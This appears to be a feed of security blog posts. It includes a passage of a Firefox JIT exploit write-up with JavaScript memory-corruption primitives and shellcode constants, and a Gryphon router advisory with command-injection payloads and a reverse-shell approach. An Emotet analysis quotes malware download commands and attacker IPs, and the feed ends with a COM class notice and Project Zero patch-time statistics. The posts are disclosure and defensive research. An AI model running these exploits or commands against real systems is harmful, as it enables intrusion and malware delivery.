   console.log(arguments[0]); // 1

   delete arguments[0]; // Delete the first argument (x)

   console.log(x); // 1
   console.log(arguments[0]); // undefined
}

arg(1);

To avoid needing to separate storage for the arguments object and the named arguments, Spidermonkey implements a RareArgumentsData structure (named as such because it’s rare that anybody would even delete anything from the arguments object). This is a plain (non-NaN-boxed) pointer to a memory location that contains a bitmap. Each bit represents an index in the arguments object. If the bit is set, then the element is considered “deleted” from the arguments object. This means that the actual value doesn’t need to be removed and arguments and parameters can share the same space without problems.

The benefit of this is threefold:

  • The RareArgumentsData pointer can be moved anywhere and used to read the value of an address bit-by-bit.
  • The current RareArgumentsData pointer has no NaN-Boxing so can be read with the out-of-bounds array, giving a leaked pointer.
  • The RareArgumentsData pointer is allocated in the nursery due to its size.

To summarise this, the layout of the arguments object is as so:

The layout of the three Arguments object types in memory

By freeing up the remaining vulnerable objects in our original spray array, we can then spray ArgumentsData structures using recursion (similar to this old bug) and reallocate on top of these locations. In JavaScript this looks like:

// Global that holds the total number of objects in our original spray array
TOTAL = 0;
 
// Global that holds the target argument so it can be used later
arg = 0;
 
/*
   setup_prim - Performs recursion to get the vulnerable arguments object
       arguments[0] - Original spray array
       arguments[1] - Recursive depth counter
       arguments[2]+ - Numbers to pad to the right reallocation size
*/
function setup_prim() {
   // Base case of our recursion
   // If we have reached the end of the original spray array...
   if(arguments[1] == TOTAL) {
 
       // Delete an argument to generate the RareArgumentsData pointer
       delete arguments[3];
 
       // Read out of bounds to the next object (sprayed objects)
       // Check whether the RareArgumentsData pointer is null
       if(evil[511] != 0) return arguments;
 
       // If it was null, then we return and try the next one
       return 0;
   }
 
   // Get the cons value
   let cons = arguments[0][arguments[1]];
 
   // Move the pointer (could just do cons.p481 = 481, but this is more fun)
   new cons();
 
   // Recursive call
   res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480
 
   // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
   if(res != 0) return res;
 
   // Otherwise, repeat the base case (delete an argument)
   delete arguments[3];
 
   // Check if the next object has a null RareArgumentsData pointer
   if(evil[511] != 0) return arguments; // Return arguments if not
 
   // Otherwise just return 0 and try the next one
   return 0;
}
 
/*
   main - Performs the exploit
*/
function main() {
   ...
 
   //
   TOTAL=arr.length;
   arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480
}

Once the base case is reached, the memory layout is as so:

The tenured heap layout after the remaining slots arrays were freed and reallocated

Read Primitive

A read primitive is relatively trivial to set up from here. A double value representing the address needs to be written to the RareArgumentsData pointer. The arguments object can then be read from to check for undefined values, representing set bits:

/*
   weak_read32 - Bit-by-bit read
*/
function weak_read32(arg, addr) {
   // Set the RareArgumentsData pointer to the address
   evil[511] = addr;
 
   // Used to hold the leaked data
   let val = 0;
  
   // Read it bit-by-bit for 32 bits
   // Endianness is taken into account
   for(let i = 32; i >= 0; i--) {
       val = val = 0; i--) {
       val[0] = val[0] 

Write Primitive

Constructing a write primitive is a little more difficult. You may think we can just delete an argument to set the bit to 1, and then overwrite the argument to unset it. Unfortunately, that doesn’t work. You can delete the object and set its appropriate bit to 1, but if you set the argument again it will just allocate a new slots backing store for the arguments object and create a new property called ‘0’. This means we can only set bits, not unset them.

While this means we can’t change a memory address from one location to another, we can do something much more interesting. The aim is to create a fake object primitive using an ArrayBuffer’s backing store and an element in the ArgumentsData structure. The NaN-Boxing required for a pointer can be faked by doing the following:

  1. Write the double equivalent of the unboxed pointer to the property location.
  2. Use the bit-set capability of the arguments object to fake the pointer NaN-Box.

From here we can create a fake ArrayBuffer (A fake ArrayBuffer object within another ArrayBuffer backing store) and constantly update its backing store pointer to arbitrary memory locations to be read as Float64 values.

In order to do this, we need several bits of information:

  1. The address of the ArgumentsData structure (A tenured heap address is required).
  2. All the information from an ArrayBuffer (Group, Shape, Elements, Slots, Size, Backing Store).
  3. The address of this ArrayBuffer (A nursery heap address is required).

Getting the address of the ArgumentsData structure turns out to be pretty straight forward by iterating backwards from the RareArgumentsData pointer (As ArgumentsObject was allocated before the RareArgumentsData pointer, we work backwards) that was leaked using the corrupted array:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   old_rareargdat_ptr = evil[511];
   console.log("[+] Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16));
 
   iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value
   counter = 0; // Used to prevent a while(true) situation
   while(counter 

The next step is to allocate an ArrayBuffer and find its location:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   // The target Uint32Array - A large size value to:
   //   - Help find the object (Not many 0x00101337 values nearby!)
   //   - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
   target_uint32arr = new Uint32Array(0x101337);
 
   // Find the Uint32Array starting from the original leaked Nursery pointer
   iterator = dbl_to_bigint(old_rareargdat_ptr);
   counter = 0; // Use a counter
   while(counter 

Now that the address of the ArrayBuffer has been found, a fake/clone of it can be constructed within its own backing store:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
  
   // Create a fake ArrayBuffer through cloning
   iterator = arr_buf_addr;
   for(i=0;i

There is now a valid fake ArrayBuffer object in an area of memory. In order to turn this block of data into a fake object, an object property or an object element needs to point to the location, which gives rise to the problem: We need to create a NaN-Boxed pointer. This can be achieved using our trusty “deleted property” bitmap. Earlier I mentioned the fact that we can’t change a pointer because bits can only be set, and that’s true.

The trick here is to use the corrupted array to write the address as a float, and then use the deleted property bitmap to create the NaN-Box, in essence faking the NaN-Boxed part of the pointer:

A breakdown of how the NaN-Boxed value is put together

Using JavaScript, this can be done as so:

/*
   write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box
*/
function write_nan(arg, addr) {
   evil[511] = addr;
   for(let i = 64 - 15; i 

Finally, the write primitive can then be used by changing the fake_arrbuf backing store using target_uint32arr[14] and target_uint32arr[15]:

/*
   write - Write a value to an address
*/
function write(address, value) {
   // Set the fake ArrayBuffer backing store address
   address = dbl_to_bigint(address)
   target_uint32arr[14] = parseInt(address) & 0xffffffff
   target_uint32arr[15] = parseInt(address >> 32n);

   // Use the fake ArrayBuffer backing store to write a value to a location
   value = dbl_to_bigint(value);
   fake_arrbuf[1] = parseInt(value >> 32n);
   fake_arrbuf[0] = parseInt(value & 0xffffffffn);
}

The following diagram shows how this all connects together:

Address-Of Primitive

The last primitive is the address-of (addrof) primitive. It takes an object and returns the address that it is located in. We can use our fake ArrayBuffer for this by setting a property in our arguments object to the target object, setting the backing store of our fake ArrayBuffer to this location, and reading the address. Note that in this function we’re using our fake object to read the value instead of the bitmap. This is just another way of doing the same thing.

/*
   addrof - Gets the address of a given object
*/
function addrof(arg, o) {
   // Set the 5th property of the arguments object
   arg[5] = o;

   // Get the address of the 5th property
   target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7)

   // Set the fake ArrayBuffer backing store to point to this location
   target_uint32arr[14] = parseInt(target) & 0xffffffff;
   target_uint32arr[15] = parseInt(target >> 32n);

   // Read the address of the object o
   return (BigInt(fake_arrbuf[1] & 0xffff) 

Code Execution

With the primitives completed, the only thing left is to get code execution. While there’s nothing particularly new about this method, I will go over it in the interest of completeness.

Unlike Chrome, WASM regions aren’t read-write-execute (RWX) in Firefox. The common way to go about getting code execution is by performing JIT spraying. Simply put, a function containing a number of constant values is made. By executing this function repeatedly, we can cause the browser to JIT compile it. These constants then sit beside each other in a read-execute (RX) region. By changing the function’s JIT region pointer to these constants, they can be executed as if they were instructions:

/*
   shellcode - Constant values which hold our shellcode to pop xcalc.
*/
function shellcode(){
   find_me = 5.40900888e-315; // 0x41414141 in memory
   A = -6.828527034422786e-229; // 0x9090909090909090
   B = 8.568532312320605e+170;
   C = 1.4813365150669252e+248;
   D = -6.032447120847604e-264;
   E = -6.0391189260385385e-264;
   F = 1.0842822352493598e-25;
   G = 9.241363425014362e+44;
   H = 2.2104256869204514e+40;
   I = 2.4929675059396527e+40;
   J = 3.2459699498717e-310;
   K = 1.637926e-318;
}
 
/*
   main - Performs the exploit
*/
function main() {
   for(i = 0;i 

A video of the exploit can be found here.

Wrote an exploit for a very interesting Firefox bug. Gave me a chance to try some new things out!

More coming soon! pic.twitter.com/g6K9tuK4UG

— maxpl0it (@maxpl0it) February 1, 2022

Conclusion

Throughout this post we have covered a wide range of topics, such as the basics of JIT compilers in JavaScript engines, vulnerabilities from their assumptions, exploit primitive construction, and even using CodeQL to find variants of vulnerabilities.

Doing so meant that a new set of exploit primitives were found, an unexploitable variant of the vulnerability itself was identified, and a vulnerability with many caveats was exploited.

This blog post highlights the kind of research SentinelLabs does in order to identify exploitation patterns.

Rooting Gryphon Routers via Shared VPN

4 February 2022 at 18:15

🎵 This LAN is your LAN, this LAN is my LAN 🎵

Intro

In August 2021, I discovered and reported a number of vulnerabilities in the Gryphon Tower router, including several command injection vulnerabilities exploitable to an attacker on the router’s LAN. Furthermore, these vulnerabilities are exploitable via the Gryphon HomeBound VPN, a network shared by all devices which have enabled the HomeBound service.

The implications of this are that an attacker can exploit and gain complete control over victim routers from anywhere on the internet if the victim is using the Gryphon HomeBound service. From there, the attacker could pivot to attacking other devices on the victim’s home network.

In the sections below, I’ll walk through how I discovered these vulnerabilities and some potential exploits.

Initial Access

When initially setting up the Gryphon router, the Gryphon mobile application is used to scan a QR code on the base of the device. In fact, all configuration of the device thereafter uses the mobile application. There is no traditional web interface to speak of. When navigating to the device’s IP in a browser, one is greeted with a simple interface that is used for the router’s Parental Control type features, running on the Lua Configuration Interface (LuCI).

The physical Gryphon device is nicely put together. Removing the case was simple, and upon removing it we can see that Gryphon has already included a handy pin header for the universal asynchronous receiver-transmitter (UART) interface.

As in previous router work I used JTAGulator and PuTTY to connect to the UART interface. The JTAGulator tool lets us identify the transmit/receive data (txd / rxd) pins as well as the appropriate baud rate (the symbol rate / communication speed) so we can communicate with the device.

​​

Unfortunately the UART interface doesn’t drop us directly into a shell during normal device operation. However, while watching the boot process, we see the option to enter a “failsafe” mode.

Fs in the chat

Entering this failsafe mode does drop us into a root shell on the device, though the rest of the device’s normal startup does not take place, so no services are running. This is still an excellent advantage, however, as it allows us to grab any interesting files from the filesystem, including the code for the limited web interface.

Getting a shell via LuCI

Now that we have the code for the web interface (specifically the index.lua file at /usr/lib/lua/luci/controller/admin/) we can take a look at which urls and functions are available to us. Given that this is lua code, we do a quick ctrl-f (the most advanced of hacking techniques) for calls to os.execute(), and while most calls to it in the code are benign, our eyes are immediately drawn to the config_repeater() function.

function config_repeater()
  <snip> --removed variable setting for clarity
  cmd = “/sbin/configure_repeater.sh “ .. “\”” .. ssid .. “\”” .. “ “ .. “\”” .. key .. “\”” .. “ “ .. “\”” .. hidden .. “\”” .. “ “ .. “\”” .. ssid5 .. “\”” .. “ “ .. “\”” .. key5 .. “\”” .. “ “ .. “\”” .. mssid .. “\”” .. “ “ .. “\”” .. mkey .. “\”” .. “ “ .. “\”” .. gssid .. “\”” .. “ “ .. “\”” .. gkey .. “\”” .. “ “ .. “\”” .. ghidden .. “\”” .. “ “ .. “\”” .. country .. “\”” .. “ “ .. “\”” .. bssid .. “\”” .. “ “ .. “\”” .. board .. “\”” .. “ “ .. “\”” .. wpa .. “\””
  os.execute(cmd)
os.execute(“touch /etc/rc_in_progress.txt”)
os.execute(“/sbin/mark_router.sh 2 &”)
luci.http.header(“Access-Control-Allow-Origin”,”*”)
luci.http.prepare_content(“application/json”)
luci.http.write(“{\”rc\”: \”OK\”}”)
end

The cmd variable in the snippet above is constructed using unsanitized user input in the form of POST parameters, and is passed directly to os.execute() in a way that would allow an attacker to easily inject commands.

This config_repeater() function corresponds to the url http://192.168.1.1/cgi-bin/luci/rc

Line 42: the answer to life, the universe, and command injections.

Since we know our input will be passed directly to os.execute(), we can build a simple payload to get a shell. In this case, stringing together commands using wget to grab a python reverse shell and run it.

Now that we have a shell, we can see what other services are active and listening on open ports. The most interesting of these is the controller_server service listening on port 9999.

controller_server and controller_client

controller_server is a service which listens on port 9999 of the Gryphon router. It accepts a number of commands in json format, the appropriate format for which we determined by looking at its sister binary, controller_client. The inputs expected for each controller_server operation can be seen being constructed in corresponding operations in controller_client.

Opening controller_server in Ghidra for analysis leads one fairly quickly to a large switch/case section where the potential cases correspond to numbers associated with specific operations to be run on the device.

In order to hit this switch/case statement, the input passed to the service is a json object in the format : {“<operationNumber>” : {“<op parameter 1>”:”param 1 value”, …}}.

Where the operation number corresponds to the decimal version of the desired function from the switch/case statements, and the operation parameters and their values are in most cases passed as input to that function.

Out of curiosity, I applied the elite hacker technique of ctrl-f-ing for direct calls to system() to see whether they were using unsanitized user input. As luck would have it, many of the functions (labelled operation_xyz in the screenshot above) pass user controlled strings directly in calls to system(), meaning we just found multiple command injection vulnerabilities.

As an example, let’s look at the case for operation 0x29 (41 in decimal):

In the screenshot above, we can see that the function parses a json object looking for the key cmd, and concatenates the value of cmd to the string “/sbin/uci set wireless.”, which is then passed directly to a call to system().

This can be trivially injected using any number of methods, the simplest being passing a string containing a semicolon. For example, a cmd value of “;id>/tmp/op41” would result in the output of the id command being output to the /tmp/op41 file.

The full payload to be sent to the controller_server service listening on 9999 to achieve this would be {“41”:{“cmd”:”;id>/tmp/op41”}}.

Additionally, the service leverages SSL/TLS, so in order to send this command using something like ncat, we would need to run the following series of commands:

echo ‘{“41”:{“cmd”:”;id>/tmp/op41"}}’ | ncat — ssl <device-ip> 9999

We can use this same method against a number of the other operations as well, and could create a payload which allows us to gain a shell on the device running as root.

Fortunately, the Gryphon routers do not expose port 9999 or 80 on the WAN interface, meaning an attacker has to be on the device’s LAN to exploit the vulnerabilities. That is, unless the attacker connects to the Gryphon HomeBound VPN.

HomeBound : Your LAN is my LAN too

Gryphon HomeBound is a mobile application which, according to Gryphon, securely routes all traffic on your mobile device through your Gryphon router before it hits the internet.

In order to accomplish this the Gryphon router connects to a VPN network which is shared amongst all devices connected to HomeBound, and connects using a static openvpn configuration file located on the router’s filesystem. An attacker can use this same openvpn configuration file to connect themselves to the HomeBound network, a class B network using addresses in the 10.8.0.0/16 range.

Furthermore, the Gryphon router exposes its listening services on the tun0 interface connected to the HomeBound network. An attacker connected to the HomeBound network could leverage one of the previously mentioned vulnerabilities to attack other routers on the network, and could then pivot to attacking other devices on the individual customers’ LANs.

This puts any customer who has enabled the HomeBound service at risk of attack, since their router will be exposing vulnerable services to the HomeBound network.

In the clip below we can see an attacking machine, connected to the HomeBound VPN, running a proof of concept reverse shell against a test router which has enabled the HomeBound service.

While the HomeBound service is certainly an interesting idea for a feature in a consumer router, it is implemented in a way that leaves users’ devices vulnerable to attack.

Wrap Up

An attacker being able to execute code as root on home routers could allow them to pivot to attacking those victims’ home networks. At a time when a large portion of the world is still working from home, this poses an increased risk to both the individual’s home network as well as any corporate assets they may have connected.

At the time of writing, Gryphon has not released a fix for these issues. The Gryphon Tower routers are still vulnerable to several command injection vulnerabilities exploitable via LAN or via the HomeBound network. Furthermore, during our testing it appeared that once the HomeBound service has been enabled, there is no way to disable the router’s connection to the HomeBound VPN without a factory reset.

It is recommended that customers who think they may be vulnerable contact Gryphon support for further information.

Update (April 8 2022): The issues have been fixed in updated firmware versions released by Gryphon. See the Solution section of Tenable’s advisory or contact Gryphon for more information: https://www.tenable.com/security/research/tra-2021-51


Rooting Gryphon Routers via Shared VPN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Emotet’s Uncommon Approach of Masking IP Addresses

4 February 2022 at 23:00

Authored By: Kiran Raj

In a recent campaign of Emotet, McAfee Researchers observed a change in techniques. The Emotet maldoc was using hexadecimal and octal formats to represent IP address which is usually represented by decimal formats. An example of this is shown below:

Hexadecimal format: 0xb907d607

Octal format: 0056.0151.0121.0114

Decimal format: 185.7.214.7

This change in format might evade some AV products relying on command line parameters but McAfee was still able to protect our customers. This blog explains this new technique.

Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee
Figure 1: Image of Infection map for EMOTET Maldoc as observed by McAfee

Threat Summary

  1. The initial attack vector is a phishing email with a Microsoft Excel attachment. 
  2. Upon opening the Excel document and enabling editing, Excel executes a malicious JavaScript from a server via mshta.exe 
  3. The malicious JavaScript further invokes PowerShell to download the Emotet payload. 
  4. The downloaded Emotet payload will be executed by rundll32.exe and establishes a connection to adversaries’ command-and-control server.

Maldoc Analysis

Below is the image (figure 2) of the initial worksheet opened in excel. We can see some hidden worksheets and a social engineering message asking users to enable content. By enabling content, the user allows the malicious code to run.

On examining the excel spreadsheet further, we can see a few cell addresses added in the Named Manager window. Cells mentioned in the Auto_Open value will be executed automatically resulting in malicious code execution.

Figure 3- Named Manager and Auto_Open triggers
Figure 3- Named Manager and Auto_Open triggers

Below are the commands used in Hexadecimal and Octal variants of the Maldocs

FORMAT OBFUSCATED CMD DEOBFUSCATED CMD
Hexadecimal cmd /c m^sh^t^a h^tt^p^:/^/[0x]b907d607/fer/fer.html http://185[.]7[.]214[.]7/fer/fer.html
Octal cmd /c m^sh^t^a h^tt^p^:/^/0056[.]0151[.]0121[.]0114/c.html http://46[.]105[.]81[.]76/c.html

Execution

On executing the Excel spreadsheet, it invokes mshta to download and run the malicious JavaScript which is within an html file.

Figure 4: Process tree of excel execution
Figure 4: Process tree of excel execution

The downloaded file fer.html containing the malicious JavaScript is encoded with HTML Guardian to obfuscate the code

Figure 5- Image of HTML page viewed on browser
Figure 5- Image of HTML page viewed on a browser

The Malicious JavaScript invokes PowerShell to download the Emotet payload from “hxxp://185[.]7[.]214[.]7/fer/fer.png” to the following path “C:\Users\Public\Documents\ssd.dll”.

cmd line (New-Object Net.WebClient).DownloadString(‘http://185[.]7[.]214[.]7/fer/fer.png’)

The downloaded Emotet DLL is loaded by rundll32.exe and connects to its command-and-control server

cmd line cmd  /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString

IOC

TYPE VALUE SCANNER DETECTION NAME
XLS 06be4ce3aeae146a062b983ce21dd42b08cba908a69958729e758bc41836735c McAfee LiveSafe and Total Protection X97M/Downloader.nn
DLL a0538746ce241a518e3a056789ea60671f626613dd92f3caa5a95e92e65357b3 McAfee LiveSafe and Total Protection

 

Emotet-FSY
HTML URL http://185[.]7[.]214[.]7/fer/fer.html

http://46[.]105[.]81[.]76/c.html

WebAdvisor Blocked
DLL URL http://185[.]7[.]214[.]7/fer/fer.png

http://46[.]105[.]81[.]76/cc.png

WebAdvisor Blocked

MITRE ATT&CK

TECHNIQUE ID TACTIC TECHNIQUE DETAILS DESCRIPTION
T1566 Initial access Phishing attachment Initial maldoc uses phishing strings to convince users to open the maldoc
T1204 Execution User Execution Manual execution by user
T1071 Command and Control Standard Application Layer Protocol Attempts to connect through HTTP
T1059 Command and Scripting Interpreter Starts CMD.EXE for commands execution Excel uses cmd and PowerShell to execute command
T1218

 

Signed Binary Proxy Execution Uses RUNDLL32.EXE and MSHTA.EXE to load library rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

Next COM Programming Class

5 February 2022 at 10:42

Update: the class is cancelled. I guess there weren’t that many people interested in COM this time around.

Today I’m opening registration for the COM Programming class to be held in April. The syllabus for the 3 day class can be found here. The course will be delivered in 6 half-days (4 hours each).

Dates: April (25, 26, 27, 28), May (2, 3).
Times: 2pm to 6pm, London time
Cost: 700 USD (if paid by an individual), 1300 USD (if paid by a company).

The class will be conducted remotely using Microsoft Teams or a similar platform.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of this class. In case you have doubts, talk to me.

Participants in my Windows Internals and Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Previous students in my classes get 10% off. Multiple participants from the same company get a discount (email me for the details).

To register, send an email to [email protected] with the title “COM Training”, and write the name(s), email(s) and time zone(s) of the participants.

COMReuse

zodiacon

A walk through Project Zero metrics

By: Ryan
10 February 2022 at 16:58

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor

Total bugs

Fixed by day 90

Fixed during
grace period

Exceeded deadline

& grace period

Avg days to fix

Apple

84

73 (87%)

7 (8%)

4 (5%)

69

Microsoft

80

61 (76%)

15 (19%)

4 (5%)

83

Google

56

53 (95%)

2 (4%)

1 (2%)

44

Linux

25

24 (96%)

0 (0%)

1 (4%)

25

Adobe

19

15 (79%)

4 (21%)

0 (0%)

65

Mozilla

10

9 (90%)

1 (10%)

0 (0%)

46

Samsung

10

8 (80%)

2 (20%)

0 (0%)

72

Oracle

7

3 (43%)

0 (0%)

4 (57%)

109

Others*

55

48 (87%)

3 (5%)

4 (7%)

44

TOTAL

346

294 (84%)

34 (10%)

18 (5%)

61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only about 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

Average number of days to fix bugs across all vendors is 61 days. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor

Bugs in 2019

(avg days to fix)

Bugs in 2020

(avg days to fix)

Bugs in 2021

(avg days to fix)

Apple

61 (71)

13 (63)

11 (64)

Microsoft

46 (85)

18 (87)

16 (76)

Google

26 (49)

13 (22)

17 (53)

Linux

12 (32)

8 (22)

5 (15)

Others*

54 (63)

35 (54)

14 (29)

TOTAL

199 (67)

87 (54)

63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux overall have reduced their time to fix during the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the others not represented on the chart have collectively cut their time to fix in more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period used 9 times (notably with half being by Microsoft), versus the slightly lower average of 12.5 in the other years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor

Total bugs

Avg fix time

iOS

76

70

Android (Samsung)

10

72

Android (Pixel)

6

72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser

Bugs

Avg days from bug report to public patch

Avg days from public patch to release

Avg days from bug report to release

Chrome

40

5.3

24.6

29.9

WebKit

27

11.6

61.1

72.7

Firefox

8

16.6

21.1

37.8

Total

75

8.8

37.3

46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to "Avg days from public patch to release" column:

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, with time from bug report to releasing a fix in the stable channel in 30 days. The time to patch is very fast here, with just an average of 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public is the bulk of the overall time window, though overall we still see the Chrome (blue) bars of the histogram toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest number of days to release a patch at 73 days. Their time to land the fix publicly is in the middle between Chrome and Firefox, but unfortunately this leaves a very long amount of time for opportunistic attackers to find the patch and exploit it prior to the fix being made available to users. This can be seen by the Apple (red) bars of the second histogram mostly being on the right side of the graph, and every one of them except one being past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patch effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de-facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

